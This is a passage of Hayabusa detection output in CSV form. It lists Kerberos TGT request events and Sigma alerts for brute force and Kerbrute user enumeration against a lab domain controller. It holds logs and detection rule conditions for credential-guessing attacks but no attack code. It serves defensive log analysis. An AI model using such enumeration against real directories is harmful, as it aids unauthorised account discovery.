+09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: 
-,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:16.338 +09:00,-,-,medium,InitAccess : PrivEsc,Disabled Users Failing To Authenticate From Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:16 TargetUserName:SM_25e3b4425ffd47aab/SM_27d255b6407743b08/SM_957258b5879242afb/SM_374806bcc65140a5a/SM_2f6964c8f421408ab/krbtgt/Guest/administrator/Administrator/SM_6aaeeb113c0c4af3a/SM_b2a35e76f50a4c23a/Test-ADM/SM_8b9faa99d83446d1b/SM_2b6f1a51ac6c41b2a/DefaultAccount/$P51000-50I28MP5JB3E IpAddress:::ffff:10.23.123.11 timeframe:24h,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos2.yml,-
2021-12-02 23:48:16.342 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:16.956 +09:00,-,-,medium,InitAccess : PrivEsc,Valid Users Failing to Authenticate From Single Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:22 TargetUserName:HealthMailbox2cfa5bd/svc_adfs01/HealthMailboxf7e4358/HealthMailboxeb3dc3f/proabcdef/domadm/HealthMailboxebdc745/HealthMailboxa935ecd/vuln_scan/HealthMailboxf49e2c8/svc-ata/Svc-SQL-DB01/HealthMailboxa99e1bd/admin-te/svc_nxlog/HealthMailboxdabf0a3/HealthMailboxe8b0d98/adminupn42/HealthMailbox9a2d0da/HealthMailboxc9291f7/HealthMailbox0ab31b3/admin-hacker IpAddress:::ffff:10.23.123.11 timeframe:24h,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos.yml,-
2021-12-02 23:48:17.267 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sgfg | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.271 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: g | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.274 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dyfgdhbn | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.277 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xvtrz | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.281 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ar | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.284 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tary | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.287 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bsfin | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.319 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: mgdi | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.323 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vdr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.327 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.331 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: syvsdy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.334 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: s | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.337 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ysy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.341 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vrat | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.344 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.348 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.351 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: uydzry | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.354 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.357 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vase | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.360 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ryver | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.363 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvsyv | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.367 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: srey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.370 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: b aer | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.373 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvas | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.376 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tbyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.379 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nini | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.382 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ugu | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.385 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,"User: m,og | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -",../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.389 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: go | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.392 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nd | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.395 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bdcy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.398 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rec | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.401 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.405 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: accrt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.408 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: wyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.410 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.413 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.416 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ytuntsr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.420 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vga | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.423 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tfay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.426 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sef | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.430 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: gsdf | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.433 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sfs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:23.180 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: HealthMailboxf49e2c8 | Svc: krbtgt | IP Addr: ::ffff:10.23.42.16 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-03 21:06:03.488 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:03.493 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Guest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:03.497 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: DefaultAccount | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:03.510 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: krbtgt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:03.847 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:04.904 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Test-ADM | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:04.910 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:06.986 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: $P51000-50I28MP5JB3E | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.006 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_27d255b6407743b08 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.010 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2b6f1a51ac6c41b2a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.014 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_25e3b4425ffd47aab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.021 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_8b9faa99d83446d1b | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
